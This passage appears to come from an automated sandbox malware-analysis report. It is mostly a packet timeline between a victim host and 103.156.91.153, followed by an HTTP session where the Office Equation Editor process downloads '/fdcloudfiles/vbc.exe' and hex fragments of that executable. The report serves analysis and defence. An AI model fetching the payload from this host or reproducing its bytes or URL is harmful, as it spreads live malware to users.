                                        May 13, 2022 17:07:42.646220922 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646235943 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646235943 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646251917 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646255016 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646269083 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646270037 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646284103 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646286011 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646302938 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646303892 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646317959 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646322012 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646337032 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646338940 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646352053 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646354914 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646367073 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646372080 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646385908 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646389008 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646401882 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646405935 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646418095 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646421909 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646435976 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646439075 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646456957 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.646456957 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646471024 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.646486998 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.649616957 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650238037 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650263071 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650280952 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650296926 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650315046 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650332928 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650336981 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650347948 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650352955 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650366068 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650368929 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650382042 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650389910 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650399923 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650418043 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650434017 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650449991 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650470018 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650485992 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650502920 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650518894 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650536060 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650552034 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650568008 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.650660992 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650676966 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650679111 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650681019 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650682926 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650685072 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650686979 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650688887 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650690079 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650691986 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650693893 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.650695086 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.654114008 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.862386942 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.862466097 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.862489939 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.862515926 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.862540007 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.862564087 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.862590075 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.862615108 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.862654924 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.862694025 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864530087 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864564896 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864583969 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864607096 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864633083 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864653111 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864671946 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864675999 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864700079 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864701033 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864703894 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864720106 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864727020 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864737988 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864747047 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864758015 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864768028 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864783049 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864784956 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864805937 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864809036 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864830017 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864831924 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864845991 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864855051 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864877939 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864881992 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864902020 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864903927 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864926100 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864926100 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864938974 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864950895 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.864964962 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.864978075 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.865000963 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.865011930 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.865690947 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869189978 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869223118 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869240999 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869254112 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869271994 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869288921 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869302034 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869319916 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869327068 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869334936 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869352102 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869357109 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869366884 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869373083 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869389057 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869393110 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869411945 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869416952 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869431019 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869436979 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869450092 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869458914 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869468927 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869476080 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869488955 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869496107 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869507074 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869512081 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869524956 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869533062 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869544029 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.869549990 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869571924 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869576931 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.869609118 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.878055096 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.078670979 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078722954 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078739882 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078752995 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078769922 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078788996 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078805923 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078824043 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078840971 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078857899 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078876019 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078885078 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.078891993 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078908920 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078919888 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.078923941 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.078926086 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078927040 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.078938961 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.078943014 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.078955889 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.078975916 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081020117 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081054926 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081072092 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081089973 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081105947 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081105947 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081124067 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081131935 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081135035 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081141949 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081151009 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081160069 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081166029 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081176043 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081176996 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081192017 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081193924 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081211090 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081211090 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081228971 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081232071 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081247091 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081248045 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081264019 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081264973 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081283092 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081286907 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081295967 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081306934 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081326008 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081330061 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081341028 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081346989 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081357956 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081361055 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081374884 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081378937 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081391096 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081396103 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081408978 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081409931 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081425905 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081425905 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081439972 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081444025 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081454992 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081459999 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081475973 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081478119 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081491947 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081496000 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081509113 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081515074 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081526041 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081527948 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081542015 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081542969 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081557989 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:43.081562042 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081576109 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:43.081593990 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:45.430752039 CEST4917180192.168.2.22103.156.91.153

                                        HTTP Request Dependency Graph

                                        • 103.156.91.153

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.2249171103.156.91.15380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        TimestampkBytes transferredDirectionData
                                        May 13, 2022 17:07:41.567938089 CEST2OUTGET /fdcloudfiles/vbc.exe HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: 103.156.91.153
                                        Connection: Keep-Alive
                                        May 13, 2022 17:07:41.784928083 CEST3INHTTP/1.1 200 OK
                                        Date: Fri, 13 May 2022 15:07:42 GMT
                                        Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                        Last-Modified: Fri, 13 May 2022 06:57:17 GMT
                                        ETag: "40667-5dedf2f5fd4c5"
                                        Accept-Ranges: bytes
                                        Content-Length: 263783
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: application/x-msdownload
                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!`G@@@/OQ@@I@/OS@c>@+F@Rich@PELOah:F6@;@;P.textgh `.rdatal@@.data9@.ndata:.rsrcP;@@
                                        May 13, 2022 17:07:41.784980059 CEST5INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d a8 8a 7a 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00 e9 42 01 00 00 53 56 8b 35 b0 8a 7a 00 8d 45 a4
                                        Data Ascii: U\}t+}FEuHzHPuuu@BSV5zEWPu@eEEPu@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu
                                        May 13, 2022 17:07:41.785007954 CEST6INData Raw: 7a 00 e9 f9 16 00 00 8b 88 80 8b 7a 00 89 88 20 8b 7a 00 e9 e8 16 00 00 8b 45 d8 8d 34 85 20 8b 7a 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d dc 8b 44 85 d0 89 0e e9 d2 16 00 00 8b 45 d4 ff 34 85 20 8b 7a 00 57 e9 31 16 00 00 8b 0d 70 7a 7a 00 8b 35 50
                                        Data Ascii: zz zE4 z3;#MDE4 zW1pzz5P@;tuQEzz;PQjuP@nmjPEJ;tZj\VIf>ff;u9]tCFtuEuF;t=uu
                                        May 13, 2022 17:07:41.785031080 CEST7INData Raw: 89 1f 66 89 9f fe 07 00 00 e9 b8 11 00 00 8b 75 e4 53 e8 09 13 00 00 6a 01 8b f8 89 55 f0 e8 fd 12 00 00 59 3b f3 59 89 55 f0 75 08 3b f8 7c 08 7e 8a eb 12 3b f8 73 08 8b 45 dc e9 91 11 00 00 0f 86 76 ff ff ff 8b 45 e0 e9 83 11 00 00 6a 01 e8 cb
                                        Data Ascii: fuSjUY;YUu;|~;sEvEjjUuYUYE$L-@_+X;tSC#323;;u3;t;t3F;t3E
                                        May 13, 2022 17:07:42.000262022 CEST9INData Raw: 00 ff 75 ac eb 47 53 e8 fc 0d 00 00 8b f0 56 6a eb e8 1c 37 00 00 56 e8 97 3c 00 00 8b f0 3b f3 0f 84 6a 09 00 00 39 5d d8 74 21 56 e8 17 4b 00 00 39 5d d4 7c 0b 50 ff 75 f4 e8 d8 45 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 24 81 40
                                        Data Ascii: uGSVj7V<;j9]t!VK9]|PuE;tEV$@4jPI;tvuEvQEffjuMEQPjIEf;fEVj@8@;EjIjEIuEVSuU
                                        May 13, 2022 17:07:42.000288963 CEST10INData Raw: 00 00 8d 44 00 02 83 fe 04 75 12 6a 03 e8 9a 08 00 00 59 a3 f8 b5 40 00 56 89 55 c8 58 83 fe 03 75 0f 68 00 18 00 00 57 53 ff 75 dc e8 6e 0e 00 00 50 57 ff 75 f0 53 ff 75 bc ff 75 08 ff 15 0c 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 d3 00 00 00
                                        Data Ascii: DujY@VUXuhWSunPWuSuu@u]uhj3i;fMEQMWQSPV@3Au.}t9Mt}uEEt739]WE!@ffM^h>j;YUfn9]M
                                        May 13, 2022 17:07:42.000305891 CEST12INData Raw: 08 e8 f8 37 00 00 57 ff 15 34 81 40 00 83 4d c8 ff 53 53 ff 75 08 ff 75 c8 e8 47 09 00 00 ff 75 08 8b f8 ff 15 24 81 40 00 6a f3 3b fb 5e 7d 13 6a ef 5e ff 75 c0 ff 15 70 81 40 00 c7 45 fc 01 00 00 00 56 e9 96 f8 ff ff 53 e8 23 03 00 00 8b f8 59
                                        Data Ascii: 7W4@MSSuuGu$@j;^}j^up@EVS#Y;=zUEi5z;|uVu;Q+MtjYUEuFP;NEM9]JW?S YU09]t"9]
                                        May 13, 2022 17:07:42.000319004 CEST13INData Raw: c0 74 d0 ff 75 fc ff 15 10 80 40 00 6a 03 e8 dc 3a 00 00 85 c0 75 1e ff 75 0c ff 75 08 ff 15 18 80 40 00 eb 1b ff 75 fc ff 15 10 80 40 00 b8 eb 03 00 00 eb 0b 6a 00 56 ff 75 0c ff 75 08 ff d0 5f 5e 5b c9 c2 0c 00 55 8b ec 81 ec 80 00 00 00 81 7d
                                        Data Ascii: tu@j:uuu@u@jVuu_^[U}ujhju@@E}uEF=zT@u @PEQPT@EPuD@EPhu,30y@y;rPjdQ@UV39ut
